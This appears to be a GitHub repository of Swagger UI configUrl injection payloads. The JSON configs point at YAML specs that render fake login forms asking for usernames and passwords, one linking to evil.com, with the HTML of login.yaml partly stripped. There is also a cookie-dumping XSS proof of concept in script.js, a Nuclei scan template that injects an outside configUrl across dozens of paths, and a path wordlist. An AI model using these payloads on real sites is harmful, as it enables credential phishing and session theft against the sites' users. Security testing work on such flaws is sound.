├── README.md ├── login.json ├── rlogin.json ├── xsstest.json ├── xsscookie.json ├── script.js ├── rlogin.yaml ├── login.yaml ├── Swagger.yaml └── swagger-wordlist.txt /README.md: -------------------------------------------------------------------------------- 1 | ⚠️ **Disclaimer**: The content in this repository is for educational and informational purposes only; the authors hold no responsibility for misuse. Ensure proper authorization before use, act responsibly at your own risk, and comply with all legal and ethical guidelines. 2 | -------------------------------------------------------------------------------- /login.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/login.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /rlogin.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/rlogin.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /xsstest.json: -------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsstest.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /xsscookie.json: 
-------------------------------------------------------------------------------- 1 | { 2 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.yaml", 3 | "urls": [ 4 | { 5 | "url": "https://raw.githubusercontent.com/coffinxp/swagger/refs/heads/main/xsscookie.yaml", 6 | "name": "Coffinxp" 7 | } 8 | ] 9 | } 10 | -------------------------------------------------------------------------------- /script.js: -------------------------------------------------------------------------------- 1 | const details = ` 2 | 🚨 XSS Detected 🚨 3 | ======================== 4 | 🏁 Origin: ${window.origin} 5 | 🌐 Location: ${window.location} 6 | 🔗 Href: ${window.location.href} 7 | 🏢 Hostname: ${window.location.hostname} 8 | 📂 Pathname: ${window.location.pathname} 9 | ❓ Search: ${window.location.search} 10 | 👪 Parent Origin: ${window.parent?.origin || 'N/A'} 11 | 🧑‍💻 Top Origin: ${window.top?.origin || 'N/A'} 12 | 🖼️ Frames Length: ${window.frames.length} 13 | 🪪 Window Name: ${window.name} 14 | ======================== 15 | 🍪 Cookies: ${document.cookie || 'No cookies available'} 16 | 🕵️ User-Agent: ${navigator.userAgent} 17 | ⏳ Timestamp: ${new Date().toISOString()} 18 | `; 19 | 20 | alert(details); 21 | console.log(details); 22 | -------------------------------------------------------------------------------- /rlogin.yaml: -------------------------------------------------------------------------------- 1 | swagger: '2.0' 2 | info: 3 | version: 1.0.0 4 | title: Login Page 5 | description: Login to continue services below or go to https://evil.com 6 | 7 | paths: 8 | /Login_Page: 9 | post: 10 | summary: Login here to continue 11 | description: Please provide your credentials to log in. 
12 | parameters: 13 | - name: username 14 | in: formData 15 | description: The username for login 16 | required: true 17 | type: string 18 | - name: password 19 | in: formData 20 | description: The password for login 21 | required: true 22 | type: string 23 | tags: 24 | - Click here to login 25 | responses: 26 | '200': 27 | description: Successfully logged in and authenticated. 28 | '400': 29 | description: Invalid credentials or missing parameters. 30 | '500': 31 | description: Internal server error. 32 | -------------------------------------------------------------------------------- /login.yaml: -------------------------------------------------------------------------------- 1 | swagger: '2.0' 2 | info: 3 | version: 1.0.0 4 | title: Login Page 5 | description: '
6 | 7 |
8 |
9 | An error occurred while loading, please log in. 10 |
11 |
12 | 13 | 14 |
15 |

Login Page

16 |
17 | 30 |
31 |
32 | 33 | 34 |
35 | Coffinxp~/.lostsec 36 |
37 | 38 | 39 | ' 40 | paths: 41 | /: 42 | post: 43 | responses: 44 | '200': 45 | description: Login successful 46 | -------------------------------------------------------------------------------- /Swagger.yaml: -------------------------------------------------------------------------------- 1 | id: swagger-ui-config-url-injection-Extensive 2 | 3 | info: 4 | name: Swagger UI Config URL Injection 5 | author: Shadowbyte 6 | severity: low 7 | description: Detects whether Swagger UI endpoints still load (HTTP 200) with Swagger UI content when a configUrl parameter is appended. The matchers only confirm that a Swagger UI page was served, not that the supplied configUrl was fetched or applied, so a match needs manual confirmation. Includes versioned paths. 8 | tags: swagger-ui,xss,injection 9 | 10 | requests: 11 | - method: GET 12 | path: 13 | - '{{BaseURL}}/?configUrl=https://xss.smarpo.com/test.json' 14 | - '{{BaseURL}}/index.html?configUrl=https://xss.smarpo.com/test.json' 15 | - '{{BaseURL}}/swagger-ui?configUrl=https://xss.smarpo.com/test.json' 16 | - '{{BaseURL}}/api/?configUrl=https://xss.smarpo.com/test.json' 17 | - '{{BaseURL}}/docs/?configUrl=https://xss.smarpo.com/test.json' 18 | - '{{BaseURL}}/idm/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 19 | - '{{BaseURL}}/docs/api-reference?configUrl=https://xss.smarpo.com/test.json' 20 | - '{{BaseURL}}/swaggerui?configUrl=https://xss.smarpo.com/test.json' 21 | - '{{BaseURL}}/api/help?configUrl=https://xss.smarpo.com/test.json' 22 | - '{{BaseURL}}/doc?configUrl=https://xss.smarpo.com/test.json' 23 | - '{{BaseURL}}/api-reference?configUrl=https://xss.smarpo.com/test.json' 24 | - '{{BaseURL}}/swagger/docs/v1?configUrl=https://xss.smarpo.com/test.json' 25 | - '{{BaseURL}}/reference?configUrl=https://xss.smarpo.com/test.json' 26 | - '{{BaseURL}}/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json' 27 | - '{{BaseURL}}/swagger/index.html?configUrl=https://xss.smarpo.com/test.json' 28 | - '{{BaseURL}}/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 29 | - '{{BaseURL}}/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 
30 | - '{{BaseURL}}/api/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 31 | - '{{BaseURL}}/api-docs/?configUrl=https://xss.smarpo.com/test.json' 32 | - '{{BaseURL}}/api/index.html?configUrl=https://xss.smarpo.com/test.json' 33 | - '{{BaseURL}}/api/docs/?configUrl=https://xss.smarpo.com/test.json' 34 | - '{{BaseURL}}/api/swagger/index.html?configUrl=https://xss.smarpo.com/test.json' 35 | - '{{BaseURL}}/api/swagger/swagger-ui.html?configUrl=https://xss.smarpo.com/test.json' 36 | - '{{BaseURL}}/api/swagger-ui/api-docs?configUrl=https://xss.smarpo.com/test.json' 37 | - '{{BaseURL}}/api/api-docs?configUrl=https://xss.smarpo.com/test.json' 38 | - '{{BaseURL}}/api/apidocs?configUrl=https://xss.smarpo.com/test.json' 39 | - '{{BaseURL}}/api/swagger?configUrl=https://xss.smarpo.com/test.json' 40 | - '{{BaseURL}}/api/swagger/static/index.html?configUrl=https://xss.smarpo.com/test.json' 41 | - '{{BaseURL}}/api/swagger-resources?configUrl=https://xss.smarpo.com/test.json' 42 | - '{{BaseURL}}/api/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 43 | - '{{BaseURL}}/api/__swagger__/?configUrl=https://xss.smarpo.com/test.json' 44 | - '{{BaseURL}}/api/_swagger_/?configUrl=https://xss.smarpo.com/test.json' 45 | - '{{BaseURL}}/api/spec?configUrl=https://xss.smarpo.com/test.json' 46 | - '{{BaseURL}}/api/swagger/ui/index?configUrl=https://xss.smarpo.com/test.json' 47 | - '{{BaseURL}}/__swagger__/?configUrl=https://xss.smarpo.com/test.json' 48 | - '{{BaseURL}}/api/v2/doc?configUrl=https://xss.smarpo.com/test.json' 49 | - '{{BaseURL}}/api/v1/?configUrl=https://xss.smarpo.com/test.json' 50 | - '{{BaseURL}}/api/v1/doc?configUrl=https://xss.smarpo.com/test.json' 51 | - '{{BaseURL}}/_swagger_/?configUrl=https://xss.smarpo.com/test.json' 52 | - '{{BaseURL}}/swagger-resources/restservices/v2/api-docs?configUrl=https://xss.smarpo.com/test.json' 53 | - '{{BaseURL}}/classicapi/doc/?configUrl=https://xss.smarpo.com/test.json' 54 | - 
'{{BaseURL}}/api/v1/openapi?configUrl=https://xss.smarpo.com/test.json' 55 | # Versioned paths 56 | - '{{BaseURL}}/v0.12/index.html?configUrl=https://xss.smarpo.com/test.json' 57 | - '{{BaseURL}}/v0.11/index.html?configUrl=https://xss.smarpo.com/test.json' 58 | - '{{BaseURL}}/v0.10/index.html?configUrl=https://xss.smarpo.com/test.json' 59 | - '{{BaseURL}}/v0.9/index.html?configUrl=https://xss.smarpo.com/test.json' 60 | - '{{BaseURL}}/v0.8/index.html?configUrl=https://xss.smarpo.com/test.json' 61 | - '{{BaseURL}}/v0.7/index.html?configUrl=https://xss.smarpo.com/test.json' 62 | - '{{BaseURL}}/v0.6/index.html?configUrl=https://xss.smarpo.com/test.json' 63 | - '{{BaseURL}}/v0.5/index.html?configUrl=https://xss.smarpo.com/test.json' 64 | - '{{BaseURL}}/v0.4/index.html?configUrl=https://xss.smarpo.com/test.json' 65 | - '{{BaseURL}}/v0.3/index.html?configUrl=https://xss.smarpo.com/test.json' 66 | - '{{BaseURL}}/v0.2/index.html?configUrl=https://xss.smarpo.com/test.json' 67 | - '{{BaseURL}}/v0.1/index.html?configUrl=https://xss.smarpo.com/test.json' 68 | 69 | redirects: true 70 | max-redirects: 3 71 | 72 | matchers-condition: and 73 | matchers: 74 | - type: word 75 | part: body 76 | words: 77 | - "swagger-ui" # Swagger UI specific identifier 78 | - "swagger-initializer" # Swagger UI common script 79 | - "api-docs" # Often present in API docs 80 | - "swagger.json" # Common in Swagger UI 81 | condition: or 82 | 83 | - type: status 84 | status: 85 | - 200 86 | -------------------------------------------------------------------------------- /swagger-wordlist.txt: -------------------------------------------------------------------------------- 1 | /api 2 | /api/ 3 | api 4 | api/ 5 | /api/api-docs 6 | /api/apidocs 7 | api/api-docs 8 | api/apidocs 9 | /api/api-docs/swagger.json 10 | /api/apidocs/swagger.json 11 | api/api-docs/swagger.json 12 | api/apidocs/swagger.json 13 | /api/api-docs/swagger.yaml 14 | /api/apidocs/swagger.yaml 15 | api/api-docs/swagger.yaml 16 | 
api/apidocs/swagger.yaml 17 | /api/doc 18 | api/doc 19 | /api/doc.json 20 | api/doc.json 21 | /api-docs/ 22 | /api/docs/ 23 | /api_docs 24 | api-docs 25 | api-docs/ 26 | api/docs 27 | api/docs/ 28 | api_docs 29 | /api-docs/swagger.json 30 | api-docs/swagger.json 31 | /api-docs/swagger.yaml 32 | api-docs/swagger.yaml 33 | api/documentation 34 | api/documentation/ 35 | /api/help 36 | api/help 37 | /api/index.html 38 | api/index.html 39 | api/openapi.json 40 | api/openapi.yaml 41 | /api-reference 42 | api-reference 43 | /api/spec 44 | api/spec 45 | /api/spec/swagger.json 46 | api/spec/swagger.json 47 | /api/spec/swagger.yaml 48 | api/spec/swagger.yaml 49 | /api/__swagger__/ 50 | /api/_swagger_/ 51 | /api/swagger 52 | api/__swagger__/ 53 | api/_swagger_/ 54 | api/swagger 55 | api/swagger/ 56 | /api/swagger_doc.json 57 | api/swagger_doc.json 58 | /api/swagger/index.html 59 | api/swagger/index.html 60 | /api/swagger.json 61 | api/swagger.json 62 | /api/swagger-resources 63 | api/swagger-resources 64 | /api/swagger-resources/restservices/v2/api-docs 65 | api/swagger-resources/restservices/v2/api-docs 66 | /api/swagger/static/index.html 67 | api/swagger/static/index.html 68 | /api/swagger/swagger-ui.html 69 | api/swagger/swagger-ui.html 70 | api/swagger-ui 71 | api/swagger-ui/ 72 | /api/swagger-ui/api-docs 73 | api/swagger-ui/api-docs 74 | /api/swagger-ui.html 75 | api/swagger-ui.html 76 | /api/swagger/ui/index 77 | api/swagger/ui/index 78 | /api/swagger-ui/swagger.json 79 | api/swagger-ui/swagger.json 80 | /api/swagger-ui/swagger.yaml 81 | api/swagger-ui/swagger.yaml 82 | /api/swagger.yaml 83 | api/swagger.yaml 84 | /api/swagger.yml 85 | api/swagger.yml 86 | /api/v1/ 87 | api/v1/ 88 | api/v1/api-docs 89 | /api/v1/doc 90 | api/v1/doc 91 | /api/v1/openapi 92 | api/v1/openapi 93 | /api/v1/swagger-ui/swagger.json 94 | api/v1/swagger-ui/swagger.json 95 | /api/v1/swagger-ui/swagger.yaml 96 | api/v1/swagger-ui/swagger.yaml 97 | api/v2/api-docs 98 | /api/v2/doc 99 | api/v2/doc 
100 | api/v3/api-docs 101 | /classicapi/doc/ 102 | classicapi/doc/ 103 | /doc 104 | doc 105 | /docs 106 | /docs/ 107 | docs 108 | docs/ 109 | /docs/api-reference 110 | docs/api-reference 111 | /docu 112 | docu 113 | documentation 114 | documentation/ 115 | /idm/v2/api-docs 116 | idm/v2/api-docs 117 | /index.html 118 | index.html 119 | openapi 120 | openapi/ 121 | openapi/api-docs 122 | openapi/api-docs/ 123 | openapi.json 124 | openapi/swagger.json 125 | openapi/swagger-ui 126 | openapi/swagger-ui/ 127 | openapi/swagger-ui.html 128 | openapi/swagger.yaml 129 | openapi/v1 130 | openapi/v1.json 131 | openapi/v1.yaml 132 | openapi/v2 133 | openapi/v2.json 134 | openapi/v2.yaml 135 | openapi/v3 136 | openapi/v3.json 137 | openapi/v3.yaml 138 | openapi.yaml 139 | public/api-docs 140 | public/api-docs/ 141 | public/docs 142 | public/docs/ 143 | public/documentation 144 | public/documentation/ 145 | public/swagger 146 | public/swagger/ 147 | public/swagger.json 148 | public/swagger-ui 149 | public/swagger-ui/ 150 | public/swagger-ui.html 151 | public/swagger.yaml 152 | /reference 153 | reference 154 | rest/api-docs 155 | rest/api-docs/ 156 | rest/docs 157 | rest/docs/ 158 | rest/documentation 159 | rest/documentation/ 160 | rest/swagger/ 161 | rest/swagger.json 162 | rest/swagger-ui/ 163 | rest/swagger-ui.html 164 | rest/swagger.yaml 165 | /__swagger__/ 166 | /_swagger_/ 167 | /swagger 168 | __swagger__/ 169 | _swagger_/ 170 | swagger 171 | swagger/ 172 | /swagger/docs/v1 173 | swagger/docs/v1 174 | /swagger/index.html 175 | swagger/index.html 176 | /swagger.json 177 | swagger.json 178 | /swagger-resources 179 | swagger-resources 180 | swagger-resources/ 181 | swagger-resources/configuration 182 | swagger-resources/configuration/security 183 | swagger-resources/configuration/ui 184 | /swagger-resources/restservices/v2/api-docs 185 | swagger-resources/restservices/v2/api-docs 186 | swagger/swagger.json 187 | /swagger/swagger-ui.html 188 | swagger/swagger-ui.html 189 | 
/swagger/swagger-ui.js 190 | swagger/swagger-ui.js 191 | swagger/swagger.yaml 192 | /swagger-ui 193 | /swagger-ui/ 194 | /swaggerui 195 | swagger-ui 196 | swagger-ui/ 197 | swaggerui 198 | /swagger-ui.html 199 | swagger-ui.html 200 | /swagger/ui/index 201 | swagger/ui/index 202 | /swagger-ui.js 203 | swagger-ui.js 204 | /swagger-ui/swagger-ui.js 205 | /swagger/ui/swagger-ui.js 206 | swagger-ui/swagger-ui.js 207 | swagger/ui/swagger-ui.js 208 | /swagger/v1/swagger.json 209 | /swagger/v1/swagger.json/ 210 | swagger/v1/swagger.json 211 | /swagger/v1/swagger.yaml 212 | swagger/v1/swagger.yaml 213 | swagger/v2/swagger.json 214 | swagger/v3/swagger.json 215 | /swagger.yaml 216 | swagger.yaml 217 | /v0.10/index.html 218 | /v0.11/index.html 219 | /v0.12/index.html 220 | /v0.1/index.html 221 | /v0.2/index.html 222 | /v0.3/index.html 223 | /v0.4/index.html 224 | /v0.5/index.html 225 | /v0.6/index.html 226 | /v0.7/index.html 227 | /v0.8/index.html 228 | /v0.9/index.html 229 | v1/api-docs 230 | /v1/swagger.json 231 | v1/swagger.json 232 | v1/swagger.yaml 233 | /v1.x/swagger-ui.html 234 | v1.x/swagger-ui.html 235 | /v2/api-docs 236 | v2/api-docs 237 | v2/swagger.json 238 | v2/swagger.yaml 239 | v3/api-docs 240 | v3/swagger.json 241 | v3/swagger.yaml 242 | /webjars/swagger-ui/index.html 243 | webjars/swagger-ui/index.html 244 | --------------------------------------------------------------------------------